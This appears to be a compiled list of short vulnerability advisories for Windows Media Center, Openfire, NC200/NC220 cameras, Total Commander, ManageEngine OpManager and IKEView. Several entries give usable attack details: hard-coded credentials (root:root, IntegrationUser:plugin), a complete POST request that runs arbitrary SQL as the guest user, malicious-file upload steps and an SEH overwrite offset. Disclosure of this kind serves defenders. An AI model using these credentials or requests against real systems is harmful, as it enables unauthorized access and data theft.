This module exploits a vulnerability in Windows Media Center. By supplying an UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.
No CSRF tokens exists allowing us to take malicious actions against the application. 1- change admin password. 2- add aribitrary users to the system 3- edit server settings e.g. turn off SSL. 4- Add rogue malicious clients with permit access (Allow all XMPP clients to connect) and more...
No check is made when updating the user privileges, allowing regular user to become an admin. Escalation can be done remotely too if user is logged in as no CSRF token exist.
In 'available-plugins.jsp' there is no validation for plugin downloads, allowing arbitrary file downloads from anywhere on the internet. On line 40: all that needs to be satisfied is the paramater is not null. If the above condition check returns true, the application downloads whatever file you give it.
Application specifies Plugin files (.jar) can be uploaded directly by using the form, however so can the following: .exe, .php, .jsp, .py, .sh. Exploit code: choose some malicious file using the File browser and click 'upload plugin' at http://localhost:9090/plugin-admin.jsp. Our malicious uploaded files will be stored under /openfire/plugins directory.
NC220 and NC200 utilizes hard-coded credentials within its Linux distribution image. These sets of credentials (root:root) are never exposed to the end-user and cannot be changed through any normal operation of the camera.
Total Commander is vulnerable to a SEH overwrite vulnerability. By supplying a specially crafted file to the Change Attributes feature, an attacker can overwrite the SEH handler and cause a crash.
ManageEngine OpManager ships with a default account 'IntegrationUser' with the password 'plugin'. This account is hidden from the user interface and will never show up in the user management. Also changing the password for this account is not possible by default. The account however is assigned Administrator privileges and logging in with this account is possible via the web interface. Any account that has access to the web interace can also access the PostgreSQL database. This means that any user with access to the web interface can access the database and gain access to the data stored in the database.
Every user has the ability to execute SQL queries through the "/event/runQuery.do" script, including the default "guest" user. (The SQL query option is just not visible in the web interface) Below is the POST request, executed as "guest": POST /event/runQuery.do HTTP/1.1 Host: 192.168.2.116:8400 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID=XXXXXXXXXX Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: XXX query=SELECT+*+FROM+EVENTLOG This vulnerability allows an attacker to execute arbitrary SQL queries against the database, allowing for example to dump the user database.
IKEView.exe is vulnerable to local stack based buffer overflow when parsing an malicious (internet key exchange) ".elg" file. Vulnerability causes nSEH & SEH pointer overwrites at 4448 bytes after IKEView parses our malicious file, which may result then result in arbitrary attacker supplied code execution.
Services By CQR